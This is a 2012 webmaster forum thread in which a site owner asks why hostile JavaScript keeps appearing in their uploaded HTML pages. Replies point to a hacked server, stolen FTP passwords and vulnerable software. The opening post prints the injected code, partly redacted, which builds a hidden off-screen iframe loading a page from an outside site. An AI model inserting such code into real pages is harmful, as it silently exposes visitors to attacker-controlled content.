homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Code, Content, and Presentation / HTML
Forum Library, Charter, Moderators: incrediBILL

HTML Forum

Nasty virus code unexplainably in my html
Uploaded page turns adwarey

Msg#: 4472821 posted 3:24 pm on Jul 5, 2012 (gmt 0)

Hi there! Please help me! It's driving me crazy:

Whenever I upload a simple html website, within a day or so something somehow adds some kind of virus code to it. The latest code looks like this, with the details of it sometimes changing:

var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.localwebgeek.com/wp-feeds.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('
alphanumeric sequence) + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');

What is this and where does it come from? Something automatically adds it to my webpages after they have been uploaded for a day or so.

Most importantly, how do I stop this dead in its tracks? Any help would be severely appreciated.

[edited by: tedster at 6:08 pm (utc) on Jul 5, 2012]
[edit reason] Remove chance of infection from the post [/edit]



WebmasterWorld Senior Member 10+ Year Member

Msg#: 4472821 posted 3:28 pm on Jul 5, 2012 (gmt 0)

Your site has almost certainly been hacked. Search on "remove malware from website" and you should find some good advice.


WebmasterWorld Senior Member tedster us a WebmasterWorld Top Contributor of All Time 10+ Year Member

Msg#: 4472821 posted 6:28 pm on Jul 5, 2012 (gmt 0)

No doubt your server has been hacked - and they installed a hidden file on the server that keeps overwriting the files when you try to fix them. This kind of hack has now been around for several years and the coders (criminals) have become way too sophisticated.

I just recently struggled with a similar "parasite content" hack and because the client had sub-standard hosting support, IMO - the only practical fix we could put together was to migrate their site to another web host.


WebmasterWorld Administrator incredibill us a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

Msg#: 4472821 posted 7:23 pm on Jul 5, 2012 (gmt 0)

This is also a reason I tell people don't use shared hosting if you can avoid it. No matter how good the hosting is, any customer that doesn't know what they're doing, which is the majority, can allow the server to be compromised by running outdated software that has known vulnerabilities.

I found a host a couple of years ago that had 50% of their shared hosting clients index pages infected on at least 20 servers that I tested. It was nearly a thousand domains involved, maybe more.

Bottom line, even if you clean up your account it can get infected over and over if you remain on that server so I agree with Tedster that moving to a new host is probably the best strategy.


WebmasterWorld Senior Member jimbeetle us a WebmasterWorld Top Contributor of All Time 10+ Year Member

Msg#: 4472821 posted 9:23 pm on Jul 5, 2012 (gmt 0)

The other possibility is your local machine, that's what happened to me a couple of years ago when somehow mine got infected with a keylogger script. So, besides getting in touch with your host be sure to scrub your local machine with AV and anti-malware programs.


Msg#: 4472821 posted 4:06 am on Jul 11, 2012 (gmt 0)

Most importantly, how do I stop this dead in its tracks? Any help would be severely appreciated.

Any chance you're using Plesk? If yes you need to change ALL passwords. More info: [kb.parallels.com...]

You need to go through your logs, see which files they did modify, either htaccess, php and html files.

It looks like you're using AJAX to generate the content, look in php & js files for code surrounded by c3284d.

More info here too: [stopmalvertising.com...]


Msg#: 4472821 posted 5:23 am on Jul 14, 2012 (gmt 0)

Thank you for your thinking on the matter. This was indeed something that drove me insane; however for now I have changed all possible passwords and so far it seems to be working, which makes me think that somehow somebody's rubbish stole my passwords and automatically re-uploaded versions of my website with the code in it. Now they don't have the passwords anymore they can't quite do it.

Please write your senate that we, the people, would like to have the death penalty instated for creators of malware.


Msg#: 4472821 posted 11:59 am on Jul 14, 2012 (gmt 0)

You're welcome. :) It is a password issue indeed.

Just a quick question if you don't mind. Any chance that you're using Filezilla? And if yes, did you have malware on the PC recently?

Thanks for your time.


Msg#: 4472821 posted 6:57 pm on Jul 16, 2012 (gmt 0)

I did use Filezilla up until a few weeks ago, but just took a wild guess at some point that if the file uploaded is different than the original on my computer, it could be the FTP software that is rewriting it right before uploading it, so I uninstalled Filezilla and now use Coffee cup.

Coffee cup doens't seem to upload all the pictures correctly unfortunately, but the text files are uploaded right. Haven't had problems of files uploaded being different than the originals as far as I can make out. Hopefully it won't start later.


5+ Year Member

Msg#: 4472821 posted 11:03 pm on Jul 16, 2012 (gmt 0)

I don't believe that Filezilla can be bad !

The server has just been hacked, nothing else to look at.


WebmasterWorld Senior Member leosghost us a WebmasterWorld Top Contributor of All Time 10+ Year Member

Msg#: 4472821 posted 11:39 pm on Jul 16, 2012 (gmt 0)

Some hacks may take a while to be implemented..no rush ..

re ..filezilla "vanilla" problems..

( there are many more threads and posts here and elsewhere on the net about filezilla vulnerabilities )

Perfectly possible that the hacker knew how to get in for quite some time..and merely waited until they felt the moment was propitious..


Msg#: 4472821 posted 4:11 am on Jul 17, 2012 (gmt 0)

When I did mention FileZilla I was refereing to the fact that passwords are stored in plain text and Filezilla among others is a target by malware. The malware steals the creditials and uploads them to a remote C&C server. That's one of the reasons why websites get hacked.


Msg#: 4472821 posted 6:15 am on Jul 17, 2012 (gmt 0)

The latest version of ProFTPD still is vulnerable to the "Roaring Beast" root exploit, meaning this is a possible vector too for the infections. Note that Plesk Panels contains a copy of ProFTPD.

Source: https://auscert.org.au/15526

Global Options:
 top home search open messages active posts  

Home / Forums Index / Code, Content, and Presentation / HTML
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved